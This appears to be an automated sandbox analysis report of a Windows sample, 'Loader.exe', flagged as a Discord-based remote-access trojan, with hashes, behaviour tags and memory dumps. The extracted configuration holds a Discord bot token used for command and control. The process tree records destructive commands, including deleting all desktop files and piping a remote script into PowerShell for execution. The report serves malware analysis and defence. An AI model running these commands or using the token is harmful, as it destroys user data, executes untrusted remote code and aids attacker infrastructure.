Overview

overview

10

Static

static

10

Loader.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-12-2024 20:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Loader.exe

  • Size

    92KB

  • MD5

    1301b9ea64d8390d9970ca0525b10154

  • SHA1

    0c06706061f6457871f5e88aff1a12cfcc2960be

  • SHA256

    0f070514a21f205c7d933c888e2adfd9b9a88ee974bc5df6542e2e281c2876f1

  • SHA512

    b83033cb2195f38105cf16fa8ff6967415b68fd01b5925e71ad43e5b1b72815f164f8e9c82e52d1bb727073e61c2d3b46cd4969dd893835f5cde6883ed31cf57

  • SSDEEP

    1536:SbPuJtGN8F+9okEPBAqcBPDyc5I0bpAkAfLgbGNrb9xCIpOMeG73:UuJkN8FwokzBBPDyc5RQgbGNrUGD

Score
10/10
discordratdefense_evasionpersistenceransomwareratrootkitstealer

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTEyODc1NDE4NjI0MzI5NzMwMg.G7x4DL.C_NV-XSCLkwRQbJ-r5Quy0tggrU3wc8H7rWdS4

  • server_id

    1316838123023630386

Signatures

  • Discord RAT

    A RAT written in C# using Discord as a C2.

    stealerrootkitratpersistencediscordrat
  • Discordrat family
    discordrat
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 28 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:848
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /C msg * olá raphael
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3136
      • C:\Windows\system32\msg.exe
        msg * olá raphael
        3⤵
          PID:4468
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /C del "%USERPROFILE%\Desktop\image*.png"
        2⤵
          PID:2864
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /C echo. > "%USERPROFILE%\Desktop\image.png"
          2⤵
            PID:1180
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /C echo. > "%USERPROFILE%\Desktop\image1.png"
            2⤵
              PID:2008
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /C del /q "%USERPROFILE%\Desktop\*.*"
              2⤵
                PID:4936
              • C:\Windows\SYSTEM32\cmd.exe
                "cmd.exe" /C irm https://massgrave.dev/get | iex
                2⤵
                  PID:4980

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\Desktop\image1.png
                Filesize

                3B

                MD5

                bc949ea893a9384070c31f083ccefd26

                SHA1

                cbb8391cb65c20e2c05a2f29211e55c49939c3db

                SHA256

                6bdf66b5bf2a44e658bea2ee86695ab150a06e600bf67cd5cce245ad54962c61

                SHA512

                e4288e71070485637ec5825f510a7daa7e75ef6c71a1b755f51e1b0f2e58e5066837f58408ea74d75db42c49372c6027d433a869904fc5efaf4876dfcfde1287

                Download Submit

              • memory/848-0-0x00007FFDC4013000-0x00007FFDC4015000-memory.dmp

                Filesize

                8KB

                Download

              • memory/848-1-0x0000029763380000-0x000002976339C000-memory.dmp

                Filesize

                112KB

                Download

              • memory/848-2-0x000002977DA80000-0x000002977DC42000-memory.dmp

                Filesize

                1.8MB

                Download

              • memory/848-3-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/848-4-0x000002977E3C0000-0x000002977E8E8000-memory.dmp

                Filesize

                5.2MB

                Download

              • memory/848-5-0x00007FFDC4013000-0x00007FFDC4015000-memory.dmp

                Filesize

                8KB

                Download

              • memory/848-6-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp

                Filesize

                10.8MB

                Download